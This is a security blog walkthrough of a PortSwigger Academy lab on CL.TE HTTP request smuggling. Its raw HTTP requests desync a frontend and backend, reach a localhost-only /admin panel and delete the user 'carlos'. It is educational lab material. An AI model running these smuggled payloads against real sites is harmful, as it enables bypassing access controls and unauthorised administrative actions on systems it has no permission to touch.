HTTP Request Smuggling – Bypassing Frontend Security Controls

This is the next blog post in the series I am publishing on Request Smuggling (Desync) vulnerabilities and attacks. These posts align with the PortSwigger Web Security Academy labs (here). The first four posts deal with theory and focus on causing errors with a smuggled request. These errors have included abnormal HTTP verbs (GPOST) and other error responses (400, 405, etc.) in what could be limited DoS attacks. This post is the first that truly shows the potential power of a smuggled payload by allowing an unauthenticated user to exercise administrative functionality on a site. Very exciting!

This is post #5 of the series. Previous posts here:

    1. CL.TE Vulnerability
    2. TE.CL Vulnerability
    3. TE Header Obfuscation
    4. CL.TE & TE.CL via Differential Responses

For this post, I am going to focus on a single lab from the Academy, which also serves as the key content/reference material for understanding and exploiting the vulnerability:

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability

The Goal: delete a user via the admin control panel with a smuggled request. The admin control panel is located on the path ‘/admin’ and the username is carlos. This is the first lab that really demonstrates a tangible impact with a smuggled request. Good stuff!

Once again, we are going to approach the lab as if we do not know we are dealing with a CL.TE vulnerability specifically. The goal is to have repeatable steps that can be used in testing outside of the Web Security Academy in your own bug bounty and security research efforts.

Step 1: Open the lab within the Burp provided preconfigured browser and browse to ‘/admin’. You’ll receive a 403 Forbidden response with the message:

"Path /admin is blocked"

Since we are not an admin, this makes sense. There’s a defense in place that ensures the admin interface can only be accessed either with appropriate credentials or from an appropriate location.

Step 2: Just as in previous posts, we need to find a request that is vulnerable to a smuggling attack. With the browser, send a request to ‘/’ and then grab the request from the HTTP history log within Burp and send it to Repeater. Flip the GET to a POST, include a body within the request, and then send.
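As an illustration (the hostname is a placeholder for your lab instance, and the body content is arbitrary), the probing request might look something like this:

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

q=smuggledtest
```

A normal 200 response here tells us this route accepts a POST with a body.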

This works, so, we have potentially identified a soft spot to attack.

Step 3: Add in the Transfer-Encoding header. If we leave the payload within the body as is, it does not conform to expectations if TE is honored by the web application (either frontend or backend).
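For example (same placeholder hostname and body), adding the header while leaving the body as-is produces a message that is not valid chunked encoding, because a chunked body must begin with a chunk size in hex rather than the raw form data:

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Transfer-Encoding: chunked

q=smuggledtest
```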

This hangs with a 500 error, so, either the frontend or the backend is probably honoring TE.

Step 4: Update the payload to conform to Transfer-Encoding spec. At this point, just let Burp update the Content-Length (top menu Repeater –> Update Content-Length) header for ease. This will prove that the web application is handling the Transfer-Encoding header correctly.
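A conforming version might look like this (placeholder hostname and body; the chunk size is in hex, so 0xe = 14 bytes, every line ends with CRLF, and the body below is exactly 24 bytes):

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Transfer-Encoding: chunked

e
q=smuggledtest
0

```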

This works. Now, we need to see if we can get the application to break and/or respond in a way that indicates that we do in fact have a request smuggling vulnerability on this route within the web application.

Step 5: We need to determine if a mismatch between Content-Length and Transfer-Encoding causes the web application to respond with an error or hang. If the web application (all components that handle the request) responds per the HTTP specification, Content-Length should be ignored and the request should always be handled per the Transfer-Encoding header. To test, set the Content-Length to 1 shorter than the actual payload length and send the request. Make sure to turn off Repeater –> Update Content-Length from the top level menu.
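Concretely, assuming a chunked body whose true length is 24 bytes (e.g. a single 14-byte chunk ‘q=smuggledtest’ followed by the terminating ‘0’ chunk, CRLF line endings throughout), the undersized probe looks like this – the body is unchanged, only the declared length lies:

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Transfer-Encoding: chunked

e
q=smuggledtest
0

```

For the oversized test, bump the same header to 25 instead.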

With the Content-Length set to 1 character shorter than expected, the request hangs for 10 seconds and then returns a 500 error with an XML payload. Let’s try with 1 character longer.

This hangs and returns a 500 with a text error and consistently takes 15 seconds to return. We have 2 very different (and reproducible) timeout conditions. Not only that, but after waiting for the 500 to return (either 10 or 15 seconds depending), we get 2 different error payloads. Here’s my take on this behavior…

When the Content-Length is set to 23, the frontend is going to take the following payload and submit it to the backend:
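(Reconstruction – the original screenshot is not reproduced here. Assume the chunked body’s true length is 24 bytes: a single 14-byte chunk ‘q=smuggledtest’ plus the terminating ‘0’ chunk, with CRLF line endings.) Trusting Content-Length: 23, the frontend forwards only the first 23 bytes of the body:

```http
e
q=smuggledtest
0
```

The final line above ends in a bare ‘\r’ – the closing ‘\n’ of the terminating CRLF has been cut off, so a backend honoring Transfer-Encoding never sees the end of the message.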


If the backend honors the Transfer-Encoding header, the payload will be a character short (missing the final ‘\n’ that completes the terminating CRLF), which will cause it to hang. In this case, it hangs 10 seconds before it returns a 500 with the XML payload.

When the Content-Length is set to 25 (or higher), the frontend itself is waiting for additional input (the body is a character short of the declared length) before passing the payload to the backend. This causes a 15 second wait, a 500 error, and a text based payload.

Given this behavior, it would seem the frontend is not conforming to spec – it is honoring Content-Length despite Transfer-Encoding being present. This is definitely a good spot to try to smuggle a request!

Step 6: Since the frontend is honoring Content-Length, might as well let Repeater control the top level Content-Length header. Re-enable with Repeater –> Update Content-Length. Once this is done, let’s try sending through trailing content. If this works, the extra content will be queued on the backend and released on a second request.
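A minimal trailing-content probe (reconstruction with a placeholder hostname; CRLF line endings, no newline after the final line, making the body exactly 24 bytes):

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
```

The frontend, using Content-Length, forwards all 24 body bytes; the backend, using Transfer-Encoding, stops at the ‘0’ chunk and leaves ‘GET /admin HTTP/1.1’ queued as the prefix of the next request.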

Eureka! Notice we did not get a 403 Forbidden error as we did in step 1 when trying to access the /admin control panel. Instead, we must have submitted a malformed request. This makes sense. If we queued the trailing content (GET /admin HTTP/1.1) then the second request to go through the backend would look like this:

GET /admin HTTP/1.1POST / HTTP/1.1
Host: <lab>

This obviously would not work.

Step 7: We need to handle the top line of the second request by pushing it to the next line and appending it to a header that will be ignored by the backend. Enter the ‘Foo’ header.
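One way to absorb that start line (reconstruction; ‘Foo’ is just a throwaway header name, and note there is deliberately no newline after ‘Foo: x’, making the body 32 bytes):

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Foo: x
```

The next request’s ‘POST / HTTP/1.1’ start line gets appended directly to the Foo line, becoming ‘Foo: xPOST / HTTP/1.1’ – a harmless header the backend ignores.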

There we go! We are now getting the expected error when we try to access the /admin page. Scrolling down and looking at the text from the returned error:

This is interesting. When an interface is only available to local users, that often means it has to be accessed from http(s)://localhost or via some other method of specifying local access.

Step 8: Let’s try and trick it! If we specify the host within our smuggled payload, it is possible the backend will honor our host header and ignore the one getting concatenated from the second request.
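For example (reconstruction, placeholders as before; still no newline after ‘Foo: x’, making the body 49 bytes):

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Foo: x
```

The problem: the second request’s own Host header still lands inside the smuggled request’s header block, alongside our ‘Host: localhost’.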

Nope. In fact, it has a specific defense – duplicate headers are not allowed.

Step 9: We have no way to truly control the headers of the second request – it is what it is. Therefore, the only way to negate a duplicate header is to get it out of the head of the request and move it to the body. That means we have to construct the full request we want to send the /admin path and append the head of the second request into the body.
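Putting that together (a reconstruction matching the standard solution to this lab; hostname is a placeholder, and with these exact lines the outer body is 116 bytes):

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=
```

The smuggled Content-Length: 10 tells the backend to read ‘x=’ plus the first 8 bytes of the following request, so ‘POST / H’ is swallowed into the smuggled body instead of contributing duplicate headers.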

This pushes all of the headers from the second request (including the duplicate Host header) into the body. Notice we have to pay special attention to the Content-Length specified within our smuggled request payload. If it is too short, the backend will simply process the smuggled request and it will fall away. By setting the Content-Length to at least 1 character longer, we cause queueing and cause the /admin control panel to be sent client side. This is great! Now, we see the path to delete carlos.

Step 10: Let’s delete carlos. All we have to do is update the path in the smuggled request to the one returned in previous step.
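The final request (same reconstruction; the delete path is the one returned by the admin panel in the previous step, and the longer path brings the outer body to 139 bytes):

```http
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=
```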


Done! In this case, defense of the /admin portal is being handled by the frontend. The frontend disallows any request to the /admin path on the backend unless it originates from localhost. By specifying localhost within the Host header of a smuggled request, we were able to bypass a basic defense meant to prevent a non-admin user from executing administrative functionality on the site.

Lessons learned:

  • Keep it simple – always test trailing content before moving on to more complex payloads
  • Pay special attention to the Content-Length within the smuggled payload
  • When a second request causes duplicate header errors, move the headers of the second request to the body

Happy hunting!
